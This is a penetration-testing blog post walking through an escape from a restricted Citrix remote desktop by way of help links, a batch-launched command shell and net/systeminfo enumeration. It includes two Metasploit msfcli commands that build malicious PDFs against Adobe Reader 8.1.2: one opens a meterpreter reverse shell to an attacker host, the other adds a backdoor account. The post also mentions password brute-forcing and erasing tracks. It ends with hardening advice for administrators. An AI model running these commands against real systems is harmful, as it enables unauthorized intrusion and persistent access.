In this post I’ll be working against a pretty restricted remote desktop. I have once again locked down the desktop to the degree that it’s pretty unusable. I have notepad and I.E available to me, and I.E is apparently locked to the company homepage.
My goal is to bypass the restrictions and perform a little network enumeration, hopefully using the server for my own evil intentions rather than what it is intended for.
I start off by checking out the website that I can get to, looking for links out to the internet. Unfortunately I don’t find anything too useful there. It’s all very web 1.0. The admin has removed the address bar and nearly all the menu options. Most of what I would normally use to extend my reach into the server has been restricted and just hit’s me with a Restrictions dialogue window.
I carry on looking for chinks in the amour and start to find a few things that may have been missed in the group policy. What you have to remember is that there are thousands of settings in the group policies and if they are not set up properly a seemingly irrelevant setting may lead to something useful to the attacker.
Here I see the Folders option has been left available.
And this allows me to go on to browse a list of available hosts on the network. What use is that you say?
Well it gives me potential targets which may come in handy in later phases of my attack. Also if I start to see computers called Test-Server or Dev-Server I might want to take a closer look at them in particular.
I also see that the Print menu option has been left available.
Again, because this hasn’t been restricted I can use this to my advantage. Even though the admin has removed the help from the menus in Notepad and I.E lucky for me Microsoft provide plenty of links to help elsewhere in the OS.
And again I can use links in the help pages to get back to a page which does give me the address bar that I want.
And if I can browse out from there I can get to my tools.
But what tools do I really need? Well at the moment I should really find out a little more about the network so when I do download the tools I get just the ones I need to make my job of erasing tracks that little bit easier.
Even though the admin has taken away all the drive mappings as long as I can find somewhere writable I can easily create a batch file to launch a command shell with notepad. Once I have my shell things get even more interesting.
And because I can browse about a bit easier I can run my batch file and launch the shell.
Oh that’s handy, using the net command I can see how I need to tailor any brute-force attempts to avoid locking out accounts. As we have seen, so far I have been able to look at a list of available computers and the password policy.
I could use “net user /domain >userlist.txt ” to get myself a list of accounts on the domain. I know that I can run commands from the command line and create and execute batch files so from there I can write a simple FOR loop to bring a little password brute-forcing to the party. But for now let’s not get carried away and carry on with our Citrix fun.
So I have a list of users, computers, security settings, what would be nice would be software versions. Well I can easily see what the Notepad and I.E versions are. From my handy shell I can even use the “SystemInfo” command to see what hotfixes are applied.
The thing is, because this server is in a particular hostile environment it “should” be patched to the hilt. What would be nice would be to see what third-party software is installed. Of course we can’t browse the C: drive through windows, but we can through DOS.
And what do we have here? Adobe Acrobat Reader. Even though it’s been removed from my menus I can launch it through the shell and check it’s version.
Oh look at that. Version 8.1.2. I have a little Metasploit goodness for that.
Maybe I could create a pdf that will connect back to a listener and give you a meterpreter session which will use the citrix host as a pivot point to through exploits at the softer targets:
./msfcli exploit/windows/fileformat/adobe_utilprintf filename=SiteDirections.pdf payload=windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=6666 E
Or knowing that it’s likely that the version of Acrobat is the same elsewhere in the organisation, tailor a pdf to create an account on this or another system. And give it an enticing name that most (male) sys admins will struggle to ignore.
./msfcli exploit/windows/fileformat/adobe_utilprintf filename=BritneyDoesParis.pdf payload=windows/adduser user=System-Backup pass=Password123 E
Anyway, there I am going of topic again, back to my remote desktop.
Assuming that we don’t find a vulnerable third party apps, what else can I do from this restricted user locked down to the hilt desktop? Well we all know how useful MMC’s are, from the printing help menu that I got to earlier I can search for one and what do you know?
Lunch the MMC from the handy shortcut that’s provided, add a few snap-ins here and there and my restricted user Bob is starting to feel a little more comfortable in his “locked down” desktop.
Not many admins would be comfortable with restricted users having access to this level of information I imagine.
Speaking of desktops…
The possibilities are endless.
So that’s all for this post. I just want to finish by saying that these weaknesses can be mitigated by strong group policies and restrictions, but in my opinion the admin who creates these does need to think like the attacker and use multiple layers of defence. Group policies need to be coupled with a good patching regime (OS and 3rd party) and a strong degree of least privilege. It’s also important to remember that every single system on the network is important, not just the servers.
If you got this far thanks for reading.
Here’s just a few useful keyboard shortcuts that might help you in your Citrix/Remote Desktop adventures.
SHIFT+F1 = Local Task List
SHIFT+F2 = Toggle Title Bar
SHIFT+F3 =Close Remote Application
CTRL+F1 = Displays Windows Security Desktop – Ctrl+Alt+Del
CTRL+F2 = Remote Task List
CTRL+F3 = Remote Task Manager –Ctrl+Shift+ESC
ALT+F2 = Cycle through programs
ALT+PLUS = Alt+TAB
ALT+MINUS = ALT+SHIFT+TAB
Ctrl + h = View History
Ctrl +i = View Favorites
Ctrl + t = New Tab (I.E 7)
Ctrl + n = New Window
Ctrl + o = Internet Address (browse feature)
Ctrl + n = New Browser
Ctrl + p = Print (to file)
Right Click (Shift + F10)
Save Image As
F1 = Help (and of the jump to URL as mentioned in Part 1)